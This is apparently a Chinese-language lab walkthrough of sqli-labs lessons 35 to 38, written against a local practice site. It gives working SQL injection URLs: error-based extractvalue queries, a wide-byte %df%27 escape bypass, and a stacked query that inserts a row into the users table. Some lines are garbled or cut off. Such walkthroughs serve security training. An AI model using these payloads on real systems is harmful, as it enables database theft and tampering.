LESS-35-36-37-38-39

LESS-35
由於id沒有被單引號括起來所以addslashes起不到作用所以俺正常提交即可。

輸入：
http://127.0.0.1/sqlilabs/Less-35/?id=-1 and extractvalue(1,concat(0x7e,(select database()),0x7e))–+
less-36
本體的本質和前面相同不過採用的是MySQL_real_escape_string過濾\。

http://127.0.0.1/sqlilabs/Less-36/?id=1�' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=�' user�'),0x7e))–+

輸入：
http://127.0.0.1/sqlilabs/Less-36/?id=1�’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+LESS-37
添加了
輸入：admin %df%27and extractvalue(1,concat(0x7e,(select database()),0x7e))–+
LESS-38
這個是檢查PHP是否連接上MYSQL，就是一個判斷函數1、mysqli_multi_query() 函數執行一個或多個針對數據庫的查詢。多個查詢用分號進行分隔。（有這個才能進行堆疊）
2、可以調用mysql_fetch_row()來獲取結果集中的行，或調用mysql_row_seek()和mysql_row_tell()來獲取或設置結果集中的當前行位置。一旦完成了對結果集的操作，必須調用mysql_free_result()。
3、而mysql_store_result()得到result是存下來的，你無需把全部行結果讀完，就可以進行另外的查詢。比如你進行一個查詢，得到一系列記錄，再根據這些結果，用一個循環再進行數據庫查詢，就只能用mysql_store_result()
4、my_bool mysql_more_results(MYSQL *mysql) 如果當前執行的查詢存在多個結果，返回“真”，而且應用程序必須調用mysql_next_result()來獲取結果。
輸入：http://127.0.0.1/sqlilabs/Less-38/?id=1’; insert into users(id,username,password) values (‘38’,‘less’,‘hello’)–+ （單引號沒輸入會出錯）

成功添加：